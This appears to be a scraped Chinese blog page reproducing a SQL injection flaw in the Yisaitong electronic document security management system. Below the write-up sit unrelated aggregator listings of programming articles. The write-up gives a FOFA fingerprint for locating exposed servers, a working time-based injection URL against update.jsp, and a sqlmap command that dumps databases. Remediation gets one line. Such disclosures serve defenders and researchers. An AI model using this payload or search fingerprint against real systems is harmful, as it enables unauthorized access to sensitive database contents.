zkzq
zkzq

亿赛通电子文档安全管理系统 Update.jsp SQL注入

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议

0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

亿赛通电子文档安全管理系统 Update.jsp SQL注入_第1张图片


POC

 
  
     
   
  1.  
    CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--
     
    2.  
  
 
  
修改值的大小 对应延迟时间
  
 
  
亿赛通电子文档安全管理系统 Update.jsp SQL注入_第2张图片
 
  
 
  
亿赛通电子文档安全管理系统 Update.jsp SQL注入_第3张图片
 
  
 
  
     
   
  1.  
    python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv
     
    2.  
   
  2.  
    ate/update.jsp?flag=1&ids=1,3)" --batch --dbs
     
    3.  
  
 
  
 
  
亿赛通电子文档安全管理系统 Update.jsp SQL注入_第4张图片
 
  
 
  
0x05 漏洞修复建议
 
  
设置防火墙规则,过滤漏洞相关的敏感链接监测
 
  
 
  
图片
 
  
                                                   没看够~?欢迎关注扫一扫~
 
  
亿赛通电子文档安全管理系统 Update.jsp SQL注入_第5张图片
 
  
亿赛通电子文档安全管理系统 Update.jsp SQL注入_第6张图片
 
  
 
  
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(漏洞复现,安全,java,sql,网络,web安全,数据库)

        

            

                
    
                    
  • 对象的本质:OOP编程核心揭秘
                        止观止
计算机科学OOP面对对象编程
                        
    引言面向对象编程(OOP)革命性地重塑了软件开发,其核心在于“对象”——一种模拟现实实体的计算模型。对象不仅是数据容器,更是封装了状态和行为的自治单元,使程序从指令序列转变为交互网络。通过本解析,我们将层层递进,揭示对象在OOP中的根本角色:从定义延伸到设计实践,帮助读者跨越语言差异(如Java、Python或C++),掌握这一范式的精髓。章节构建遵循技术演进:先解剖对象本质,再关联OOP支柱,最
    
                    
    • 
                    
  • 《前端基础核心知识笔记:HTML、CSS、JavaScript 及 BOM/DOM》
                        萌新小白的逆袭
前端笔记htmljavascript
                        
    html前端三剑客的介绍:HTML:页面内容的载体Css:用来美化和指定页面的显示效果JavaScript:页面显示的过程中,可以动态改变页面的内容重点属性type="text"文本输入type="password"密码输入SerlvertC超链接type="radio"value="值"单选框type="checkbox"value="值"多选框在作用设置编码格式 action是跳转的界面met
    
                    
    • 
                    
  • 双检锁(Double-Checked Locking)单例模式
                        

                        
    在项目中使用双检锁(Double-CheckedLocking)单例模式来管理JSON格式化处理对象(如`ObjectMapper`在Jackson库中,或`JsonParser`在Gson库中)是一种常见的做法。这种模式确保了对象只被创建一次,同时在多线程环境下也能保证线程安全。下面详细介绍这种模式的实现和优势。###双检锁单例模式的实现双检锁单例模式的核心思想是在创建对象时使用两次检查(“检锁
    
                    
    • 
                    
  • @Override注解
                        oliveira-time
javajava开发语言
                        
    `@Override`是Java语言中的一个注解(Annotation),用于表示一个方法声明打算覆盖其父类中的另一个方法。当你在一个子类中的方法上使用`@Override`注解时,它告诉编译器这个方法是特意用来覆盖父类中的一个具有相同名称和参数列表的方法。####使用`@Override`注解的好处:1.**明确意图**:使用`@Override`可以清楚地表明你的意图是要覆盖父类中的方法,这有
    
                    
    • 
                    
  • DNS 服务器简单介绍
                        Risehuxyc
#Windows运维服务器前端linux
                        
    DNS服务器分类:根域名服务器顶级域名服务器权威域名服务器本地域名服务器国内公共域名腾讯:DNSPod-免费智能DNS解析服务商-电信_网通_教育网,智能DNS-烟台帝思普网络科技有限公司119.29.29.29和182.254.118.118阿里:阿里公共DNS223.5.5.5和223.6.6.6whatisdnsdnsmeaning百度:百度iDNS-帮助中心-公共DNS180.76.76.
    
                    
    • 
                    
  • CSS面试题及详细答案140道之(101-120)
                        还是大剑师兰特
前后端面试题css大剑师CSS面试题
                        
    《前后端面试题》专栏集合了前后端各个知识模块的面试题,包括html,javascript,css,vue,react,java,Openlayers,leaflet,cesium,mapboxGL,threejs,nodejs,mangoDB,MySQL,Linux…。前后端面试题-专栏总目录文章目录一、本文面试题目录101.解释`text-indent`属性的作用。102.如何在CSS中实现响应
    
                    
    • 
                    
  • 9个基于MATLAB 事件触发控制
                        985计算机硕士
matlabmatlab开发语言
                        
    9个基于MATLAB事件触发控制1线性多智能体系统一致性的分布式动态事件触发控制方法。2固定拓扑和切换拓扑下多智能体系统的分布式动态事件触发一致性控制.3有限时间一致性的分布式事件驱动控制.4多智能体系统的分布式事件触发控制.5多代理网络中基于事件的协议。6非线性不确定性多智能体系统的定时事件触发一致性控制.7线性多智能体网络的全分布式事件触发协议.8非理想一般线性多智能体系统基于观测器的事件触发
    
                    
    • 
                    
  • Java内存模型
                        十丈_红尘

                        
    一谈谈对Java内存模型的理解1️⃣线程私有补充知识点:1.内存简介32位:2^32的可寻址范围;64位:2^64的可寻址范围;2.地址空间的划分内核空间:指操作系统程序和C运行时的空间,包括调度程序等;用户空间:Java程序运行时实际使用的空间;3.Java内存模型JDK1.84.程序计数器 1.当前线程所执行的字节码的行号指示器; 2.改变计数器的值来选取下一条需要执行的字节码指令; 3.和线
    
                    
    • 
                    
  • ASP.NET Core Web API 内存缓存(IMemoryCache)入门指南
                        王维志
asp.netwebapiasp.net缓存后端c#.net
                        
    在WebAPI开发中,频繁访问数据库或第三方服务可能会带来性能瓶颈。为了提升接口响应速度并减轻后端压力,使用缓存是非常有效的优化手段。本文将带你快速上手ASP.NETCore提供的内存缓存(IMemoryCache),无需安装额外库,轻量、简单、适合中小项目什么是IMemoryCache?IMemoryCache是ASP.NETCore自带的缓存机制,使用服务器内存来存储数据对象,单机部署即可使用
    
                    
    • 
                    
  • 2021-3-3晨间日记
                        灿烂的日光

                        
    今天是什么日子起床:六点多就起来了,舍友要接校车,走的早,我跟着也一起醒了。就寝:今天会早点睡,昨天晚上熬夜了。天气:晴,虽然早晚比较冷,但是十点多带孩子们出去做操已经比较热了。心情:OK纪念日:任务清单昨日完成的任务,最重要的三件事:改进:习惯养成:周目标·完成进度学习·信息·阅读昨天舍友回的晚,自己安静的看了一会儿书,把安全教案打了,今天发现整理错了还。健康·饮食·锻炼人际·家人·朋友工作·思
    
                    
    • 
                    
  • 计算机网络详解:发展史、TCP/IP协议、网络通信与应用开发全流程
                        三玖诶
网络计算机网络tcp/ipphp
                        
    文章目录1.计算机网络的发展史1.1初期阶段:网络的萌芽(1960年代)1.2第二阶段:TCP/IP协议的引入(1970-1980年代)1.3第三阶段:互联网的普及与商业化(1990年代)1.4现代网络:云计算、物联网和5G(2000年代至今)2.TCP/IP协议详解(重点)2.1TCP/IP协议的分层模型2.2TCP协议详解2.3IP协议详解3.网络通信中的关键概念3.1IP地址3.2MAC地址
    
                    
    • 
                    
  • AI人工智能领域Actor - Critic算法的可视化分析
                        AI智能探索者
AIAgent智能体开发实战人工智能算法ai
                        
    AI人工智能领域Actor-Critic算法的可视化分析关键词:Actor-Critic算法、强化学习、策略梯度、价值函数、可视化分析、神经网络、马尔可夫决策过程摘要:本文深入浅出地讲解Actor-Critic算法的核心原理,通过生活化的比喻和可视化分析,帮助读者理解这一强化学习中的重要算法。我们将从基础概念入手,逐步剖析算法架构,并通过Python代码实现和可视化演示,展示算法在实际问题中的应用
    
                    
    • 
                    
  • 2021-11-01 严正纪律 规范工作
                        锦山阁

                        
    严正纪律规范工作——甘井子区海北路小学2021-2022学年度第二学期后勤处第二次工作会议学校后勤工作一直是学校的重要工作之一,在学校中占有重要地位,其工作量大而繁琐。2021年11月1日,为了进一步提高认识,转变观念,总结经验与不足,安排部署今后的工作,甘井子区海北路小学在会议室召开了本学期第二次工作会议。一、严正纪律规范工作参加会议的领导有李信德校长,学校安全负责人邵天洋主任。李信德校长针对门
    
                    
    • 
                    
  • abp 上如何使用getstoredproccommand_如何使用Chainlink VRF在以太坊上生成随机数
                        何堤森
abp
                        
    随机数和区块链一直很难达到“一致”(译者注:区块链要求确定性,而随机数正相反)。到目前为止,区块链上还没有可验证的随机函数。原因是:交易被旷工出块后,需要网络上的多个节点来确认才算真实有效。就要求每个节点验证时都必须得出相同的结果。如果函数是随机的(每次运行的结果不一样),则每个节点将得出不同的结果,从而导致交易得不到确认。有一些解决(变通)方法[1]可以生成一些伪随机生成[2],但到目前为止,已
    
                    
    • 
                    
  • 由刘学州之死想到的
                        秀骨青松

                        
    前段时间刷抖音,突然被一个男孩吸引,这个男孩叫刘学州。之所以被他吸引,是因为他小小年纪,独自在网络上发视频,寻找自己的亲生父母。这些年网络上寻亲的太多了,早已见怪不怪了,但大多是父母费尽千辛万苦找孩子的。每每看到这样的事情,心里总是酸涩不已,毕竟骨肉分离,是人世间最残忍的痛苦。这次看到刘学州寻亲,一个15岁的孩子,在网上公开寻找亲生父母,心里着实心疼了一下。试想一下:一个未成年的孩子,早早知道了自
    
                    
    • 
                    
  • Failed to fetch http://packages.ros.org.ros/ubuntu/dists/xenial/InRelease
                        

                        
    尝试了将地址修改成http://packages.ros.org/ros/ubuntu/dists/xenial/InRelease,更差;尝试了sudorm-f/etc/apt/sources.list.d/ros-latest.list/binary-amd64/Packages不建议这么做。过了一阵子,自己好了!!!!总结:查看自己网络连接,或者等一会再update,自己就好了。
    
                    
    • 
                    
  • Java——SpringBoot系列【1】
                        

                        
    本篇就围绕Java中的Spring框架做一些讲解吧【大部分都是SpringBoot的】1、什么是SpringBoot?多年来,随着新功能的增加,spring变得越来越复杂。只需访问https://spring.io/projects页面,我们就会看到可以在我们的应用程序中使用的所有Spring项目的不同功能。如果必须启动一个新的Spring项目,我们必须添加构建路径或添加Maven依赖关系,配置应
    
                    
    • 
                    
  • 头歌实践JAVA项目开发实战入门--第10阶段【Linux操作系统】
                        

                        
    开始更新头歌了!!!有需要的小伙伴自取吧;有什么好的建议也可以评论区留言,大家一起共勉!Linux操作系统一、Linux初体验#!/bin/bash#在以下部分写出完成任务的命令#*********begin*********#cd/ls-a#*********end*********#二、Linux常用命令#!/bin/bash#在以下部分写出完成任务的命令#*********begin****
    
                    
    • 
                    
  • 头歌实践Java项目开发入门实战第三阶段【Java高级特性】
                        Y_03
头歌实践题java开发语言
                        
    本文来自头歌实践平台的Java项目实战入门【只有编程题】,如需访问其他阶段的文章,请自行阅读主页其他文章制作不易,请留下一个免费的点赞以及关注吧!!!一、Java高级特性-IO流2、字节流-输入输出packagestep2;importjava.io.File;importjava.io.FileInputStream;importjava.io.FileOutputStream;importja
    
                    
    • 
                    
  • Java Future注意事项
                        泓礼

                        
    1.Future是否可以执行完确保对结果的处理,如果漏掉了一种情况,比如返回值为空时的处理,会导致程序阻塞,这样的bug还是很难调试的本质上是对全集的处理不好导致的问题,这种问题夹杂在future场景下,更难处理
    
                    
    • 
                    
  • 华为欧拉系统(openEuler)安装 Docker 容器完整教程
                        铭keny
eureka云原生
                        
    前言:在国产化操作系统日益普及的当下,华为欧拉系统(openEuler)凭借其稳定性和安全性受到不少用户青睐。但Docker官方暂未提供对openEuler的原生支持,不过好在openEuler与CentOS底层架构兼容,我们可以通过适配CentOS的安装源来实现Docker部署。本文基于openEuler22.03LTS版本实测,详细讲解安装全过程。一、安装前的准备工作确认系统版本首先确保你的系
    
                    
    • 
                    
  • Java框架入门——SpringBoot框架
                        初尘屿风
java初尘屿风SpringBootjavaspringspringbootmavenvue
                        
    文章目录前言一、SpringBoot是什么?二、请求与响应介绍二、springBoot之helloWorld总结前言Spring都包含了哪些部分呢?主要包含SpringBoot、SpringFramework、SpringData、SpringCloud、SpringCloudDataFlow、SpringSecurity、SpringBatch等众多项目。在spring的官网中对其有详细的介绍。
    
                    
    • 
                    
  • Java——SpringBoot搭建(二)
                        

                        
    文章目录Java成长中,学习记录一、SpringBoot二、controller控制层三、entity实体类四、mapper持久层五、service业务逻辑层总结Java成长中,学习记录小白记录学习springboot项目的过程,后续内容在专栏持续更新一、SpringBootspringboot可分为4层1.controller控制层2.entity实体类3.mapper持久层4.service业
    
                    
    • 
                    
  • “闭门造车”之多模态思路浅谈:自回归学习与生成
                        PaperWeekly
回归学习数据挖掘人工智能机器学习
                        
    ©PaperWeekly原创·作者|苏剑林单位|科学空间研究方向|NLP、神经网络这篇文章我们继续来闭门造车,分享一下笔者最近对多模态学习的一些新理解。在前文《“闭门造车”之多模态思路浅谈:无损》中,我们强调了无损输入对于理想的多模型模态的重要性。如果这个观点成立,那么当前基于VQ-VAE、VQ-GAN等将图像离散化的主流思路就存在能力瓶颈,因为只需要简单计算一下信息熵就可以表明离散化必然会有严重
    
                    
    • 
                    
  • 机器视觉基础(直播回放)
                        

                        
    机器视觉基础总结:本次讲解主要围绕工业相机的基础配置、图像处理及与机器人联动通信的应用展开,重点在于相机网络设置、软件操作流程、模板匹配方法以及标定调试等内容。**相机基础配置**-需确保相机与电脑连接正常,并正确设置IP地址以避免冲突。-使用官方软件检测相机状态,若出现黄色叹号提示,则需手动修改IP地址。-网络配置完成后可在软件中看到设备并进行后续操作。**相机参数设置**-曝光时间用于调节图像
    
                    
    • 
                    
  • PE系统机器视觉实战(直播回放)
                        遨博学院
机器人竞赛机器人人工智能
                        
    PE系统机器视觉实战本次培训主要围绕视觉与机器人的综合实践展开,重点讲解了视觉标定和机器人通过视觉实现随机抓取的操作流程。以下是详细要点总结:网络配置需配置三个设备:机器人、电脑和相机的IP地址,确保网络互通。机器人IP设为192.168.1.50,电脑为60,相机为70。电脑建议使用有线网卡,关闭防火墙及杀毒软件,避免网络冲突。可通过ping命令测试网络连通性。视觉标定操作使用MVS软件配置相机
    
                    
    • 
                    
  • 重构比特币在 Sui DeFi 中的角色
                        Sui_Network
Sui科普文章重构区块链量子计算人工智能物联网web3
                        
    比特币是数字资产市场的基石,被广泛认可为安全、去中心化的价值存储,其市值已超过2万亿美元。越来越多的机构投资者将其视为抗通胀的对冲工具和长期替代资产。然而,比特币的金融用途仍受限,超过一万亿美元的BTC被闲置,既无收益,也难以提供除价格投机以外的效用。与此同时,去中心化金融(DeFi)解锁了资产的组合使用能力,使其可以被质押、借贷,并在多个金融市场中以创新方式部署。但由于比特币协议设计聚焦、交易确
    
                    
    • 
                    
  • AI人工智能领域TensorFlow的模型训练策略
                        AIGC应用创新大全
人工智能tensorflowpythonai
                        
    AI人工智能领域TensorFlow的模型训练策略关键词:TensorFlow、模型训练、深度学习、神经网络、优化策略、分布式训练、迁移学习摘要:本文将深入探讨TensorFlow框架下的模型训练策略,从基础概念到高级技巧,全面解析如何高效训练深度学习模型。我们将从数据准备、模型构建、训练优化到部署应用,一步步揭示TensorFlow模型训练的核心技术,并通过实际代码示例展示最佳实践。背景介绍目的
    
                    
    • 
                    
  • Elasticsearch数据库的数据同步机制
                        数据库管理艺术
elasticsearch数据库jenkinsai
                        
    Elasticsearch数据库的数据同步机制关键词:Elasticsearch、数据同步、近实时搜索、倒排索引、translog、refresh、flush、副本同步摘要:本文深入探讨Elasticsearch数据库的数据同步机制,从底层原理到实际应用进行全面解析。文章首先介绍Elasticsearch的基本架构和数据模型,然后详细分析其近实时搜索的实现原理,包括索引刷新(Refresh)、事务
    
                    
    • 
                    
  • Golang 数据库缓存策略:减少 SQL 查询次数
                        

                        
    Golang数据库缓存策略:减少SQL查询次数关键词:Golang、数据库缓存、SQL查询次数、缓存策略、性能优化摘要:本文主要探讨了在Golang中使用数据库缓存策略来减少SQL查询次数的相关技术。通过深入讲解缓存的核心概念、算法原理、实际应用场景等内容,帮助读者理解如何利用缓存优化数据库性能。同时,结合具体的代码案例,详细展示了在Golang中实现缓存策略的方法,最后分析了未来的发展趋势与面临
    
                    
    • 
                                
  • java数字签名三种方式
                                    知了ing
javajdk
                                    
    以下3钟数字签名都是基于jdk7的 
1,RSA 
 

String password="test";
			// 1.初始化密钥
			KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
			keyPairGenerator.initialize(51
    
                                
    • 
                                
  • Hibernate学习笔记
                                    caoyong
Hibernate
                                    
    1>、Hibernate是数据访问层框架,是一个ORM(Object Relation Mapping)框架,作者为:Gavin King 
2>、搭建Hibernate的开发环境 
     a>、添加jar包: 
      aa>、hibernatte开发包中/lib/required/所
    
                                
    • 
                                
  • 设计模式之装饰器模式Decorator(结构型)
                                    漂泊一剑客
Decorator
                                    
    1. 概述 
 
 
       若你从事过面向对象开发,实现给一个类或对象增加行为,使用继承机制,这是所有面向对象语言的一个基本特性。如果已经存在的一个类缺少某些方法,或者须要给方法添加更多的功能(魅力),你也许会仅仅继承这个类来产生一个新类—这建立在额外的代码上。 
 
      
    
                                
    • 
                                
  • 读取磁盘文件txt,并输入String
                                    一炮送你回车库
String
                                    
    public static void main(String[] args) throws IOException { 
  
 String fileContent = readFileContent("d:/aaa.txt"); 
  
 System.out.println(fileContent); 
   

    
                                
    • 
                                
  • js三级联动下拉框
                                    3213213333332132
三级联动
                                    
    
//三级联动  
   省/直辖市<select id="province"></select>  
   市/省直辖<select id="city"></select>  
   县/区 <select id="area"></select>  
  
    
                                
    • 
                                
  • erlang之parse_transform编译选项的应用
                                    616050468
parse_transform游戏服务器属性同步abstract_code
                                    
             最近使用erlang重构了游戏服务器的所有代码,之前看过C++/lua写的服务器引擎代码,引擎实现了玩家属性自动同步给前端和增量更新玩家数据到数据库的功能,这也是现在很多游戏服务器的优化方向,在引擎层面去解决数据同步和数据持久化,数据发生变化了业务层不需要关心怎么去同步给前端。由于游戏过程中玩家每个业务中玩家数据更改的量其实是很少
    
                                
    • 
                                
  • JAVA JSON的解析
                                    darkranger
java
                                    
    
 
//		{
//			“Total”:“条数”,
//			 Code: 1,
//
//			“PaymentItems”:[
//			{
//			“PaymentItemID”:”支款单ID”,
//			“PaymentCode”:”支款单编号”,
//			“PaymentTime”:”支款日期”,
//			”ContractNo”:”合同号”,
//	
    
                                
    • 
                                
  • POJ-1273-Drainage Ditches
                                    aijuans
ACM_POJ
                                    
    POJ-1273-Drainage Ditches 
http://poj.org/problem?id=1273 
基本的最大流,按LRJ的白书写的 
 
#include<iostream>
#include<cstring>
#include<queue>
using namespace std;
#define INF 0x7fffffff
int ma
    
                                
    • 
                                
  • 工作流Activiti5表的命名及含义
                                    atongyeye
工作流Activiti
                                    
    activiti5 - http://activiti.org/designer/update在线插件安装 
 
activiti5一共23张表 
 
 
Activiti的表都以ACT_开头。 第二部分是表示表的用途的两个字母标识。 用途也和服务的API对应。 
 
ACT_RE_*: 'RE'表示repository。 这个前缀的表包含了流程定义和流程静态资源 (图片,规则,等等)。 
 
A
    
                                
    • 
                                
  • android的广播机制和广播的简单使用
                                    百合不是茶
android广播机制广播的注册
                                    
          Android广播机制简介  在Android中,有一些操作完成以后,会发送广播,比如说发出一条短信,或打出一个电话,如果某个程序接收了这个广播,就会做相应的处理。这个广播跟我们传统意义中的电台广播有些相似之处。之所以叫做广播,就是因为它只负责“说”而不管你“听不听”,也就是不管你接收方如何处理。另外,广播可以被不只一个应用程序所接收,当然也可能不被任何应
    
                                
    • 
                                
  • Spring事务传播行为详解
                                    bijian1013
javaspring事务传播行为
                                    
            在service类前加上@Transactional,声明这个service所有方法需要事务管理。每一个业务方法开始时都会打开一个事务。 
        Spring默认情况下会对运行期例外(RunTimeException)进行事务回滚。这
    
                                
    • 
                                
  • eidtplus operate
                                    征客丶
eidtplus
                                    
    开启列模式: Alt+C 鼠标选择   OR   Alt+鼠标左键拖动 
列模式替换或复制内容(多行): 
右键-->格式-->填充所选内容-->选择相应操作 
OR 
Ctrl+Shift+V(复制多行数据,必须行数一致) 
 
-------------------------------------------------------
    
                                
    • 
                                
  • 【Kafka一】Kafka入门
                                    bit1129
kafka
                                    
    这篇文章来自Spark集成Kafka(http://bit1129.iteye.com/blog/2174765),这里把它单独取出来,作为Kafka的入门吧 
  下载Kafka 
 http://mirror.bit.edu.cn/apache/kafka/0.8.1.1/kafka_2.10-0.8.1.1.tgz 
 2.10表示Scala的版本,而0.8.1.1表示Kafka
    
                                
    • 
                                
  • Spring 事务实现机制
                                    BlueSkator
spring代理事务
                                    
    Spring是以代理的方式实现对事务的管理。我们在Action中所使用的Service对象,其实是代理对象的实例,并不是我们所写的Service对象实例。既然是两个不同的对象,那为什么我们在Action中可以象使用Service对象一样的使用代理对象呢?为了说明问题,假设有个Service类叫AService,它的Spring事务代理类为AProxyService,AService实现了一个接口 
    
                                
    • 
                                
  • bootstrap源码学习与示例:bootstrap-dropdown(转帖)
                                    BreakingBad
bootstrapdropdown
                                    
    bootstrap-dropdown组件是个烂东西,我读后的整体感觉。 
一个下拉开菜单的设计: 
                  <ul class="nav pull-right">
                        <li id="fat-menu" class="dropdown">

    
                                
    • 
                                
  • 读《研磨设计模式》-代码笔记-中介者模式-Mediator
                                    bylijinnan
java设计模式
                                    
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 



/*
 * 中介者模式(Mediator):用一个中介对象来封装一系列的对象交互。
 * 中介者使各对象不需要显式地相互引用,从而使其耦合松散,而且可以独立地改变它们之间的交互。
 * 
 * 在我看来,Mediator模式是把多个对象(
    
                                
    • 
                                
  • 常用代码记录
                                    chenjunt3
UIExcelJ#
                                    
      
1、单据设置某行或某字段不能修改

//i是行号,"cash"是字段名称
getBillCardPanelWrapper().getBillCardPanel().getBillModel().setCellEditable(i, "cash", false);
//取得单据表体所有项用以上语句做循环就能设置整行了
getBillC
    
                                
    • 
                                
  • 搜索引擎与工作流引擎
                                    comsci
算法工作搜索引擎网络应用
                                    
      
 
    最近在公司做和搜索有关的工作,(只是简单的应用开源工具集成到自己的产品中)工作流系统的进一步设计暂时放在一边了,偶然看到谷歌的研究员吴军写的数学之美系列中的搜索引擎与图论这篇文章中的介绍,我发现这样一个关系(仅仅是猜想) 
  -----搜索引擎和流程引擎的基础--都是图论,至少像在我在JWFD中引擎算法中用到的是自定义的广度优先
    
                                
    • 
                                
  • oracle Health Monitor
                                    daizj
oracleHealth Monitor
                                    
    About Health Monitor 
 
Beginning with Release 11g, Oracle Database includes a framework called Health Monitor for running diagnostic checks on the database. 
 
About Health Monitor Checks 
 
Health M
    
                                
    • 
                                
  • JSON字符串转换为对象
                                    dieslrae
javajson
                                    
        作为前言,首先是要吐槽一下公司的脑残编译部署方式,web和core分开部署本来没什么问题,但是这丫居然不把json的包作为基础包而作为web的包,导致了core端不能使用,而且我们的core是可以当web来用的(不要在意这些细节),所以在core中处理json串就是个问题.没办法,跟编译那帮人也扯不清楚,只有自己写json的解析了. 
  
    
                                
    • 
                                
  • C语言学习八结构体,综合应用,学生管理系统
                                    dcj3sjt126com
C语言
                                    
    实现功能的代码: 
# include <stdio.h>
# include <malloc.h>

struct Student
{
	int age;
	float score;
	char name[100];
};


int main(void)
{
	int len;
	struct Student * pArr;
	int i,
    
                                
    • 
                                
  • vagrant学习笔记
                                    dcj3sjt126com
vagrant
                                    
    想了解多主机是如何定义和使用的, 所以又学习了一遍vagrant 
  
1. vagrant virtualbox 下载安装 
https://www.vagrantup.com/downloads.html 
https://www.virtualbox.org/wiki/Downloads 
  
查看安装在命令行输入vagrant 
  
  
2.
    
                                
    • 
                                
  • 14.性能优化-优化-软件配置优化
                                    frank1234
软件配置性能优化
                                    
    1.Tomcat线程池 
 
修改tomcat的server.xml文件: 
<Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" maxThreads="1200" m
    
                                
    • 
                                
  • 一个不错的shell 脚本教程 入门级
                                    HarborChung
linuxshell
                                    
    一个不错的shell 脚本教程 入门级 
建立一个脚本   Linux中有好多中不同的shell,但是通常我们使用bash (bourne again shell) 进行shell编程,因为bash是免费的并且很容易使用。所以在本文中笔者所提供的脚本都是使用bash(但是在大多数情况下,这些脚本同样可以在 bash的大姐,bourne shell中运行)。   如同其他语言一样
    
                                
    • 
                                
  • Spring4新特性——核心容器的其他改进
                                    jinnianshilongnian
spring动态代理spring4依赖注入
                                    
    Spring4新特性——泛型限定式依赖注入 
Spring4新特性——核心容器的其他改进 
Spring4新特性——Web开发的增强 
Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  
Spring4新特性——Groovy Bean定义DSL 
Spring4新特性——更好的Java泛型操作API  
Spring4新
    
                                
    • 
                                
  • Linux设置tomcat开机启动
                                    liuxingguome
tomcatlinux开机自启动
                                    
    执行命令sudo gedit /etc/init.d/tomcat6 
 
然后把以下英文部分复制过去。(注意第一句#!/bin/sh如果不写,就不是一个shell文件。然后将对应的jdk和tomcat换成你自己的目录就行了。 
 
#!/bin/bash 
 
# 
 
# /etc/rc.d/init.d/tomcat 
 
# init script for tomcat precesses
    
                                
    • 
                                
  • 第13章 Ajax进阶(下)
                                    onestopweb
Ajax
                                    
    index.html 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
    
                                
    • 
                                
  • Troubleshooting Crystal Reports off BW
                                    blueoxygen
BO
                                    
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Troubleshooting+Crystal+Reports+off+BW#TroubleshootingCrystalReportsoffBW-TracingBOE 
  
Quite useful, especially this part:  
SAP BW connectivity 
For t
    
                                
    • 
                                
  • Java开发熟手该当心的11个错误
                                    tomcat_oracle
javajvm多线程单元测试
                                    
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 
测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
    
                                
    • 
                                
  • 正则表达式大全
                                    yang852220741
html编程正则表达式
                                    
    今天向大家分享正则表达式大全,它可以大提高你的工作效率 
正则表达式也可以被当作是一门语言,当你学习一门新的编程语言的时候,他们是一个小的子语言。初看时觉得它没有任何的意义,但是很多时候,你不得不阅读一些教程,或文章来理解这些简单的描述模式。 
一、校验数字的表达式 
 
数字:^[0-9]*$ 
n位的数字:^\d{n}$ 
至少n位的数字:^\d{n,}$ 
m-n位的数字:^\d{m,n}$
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他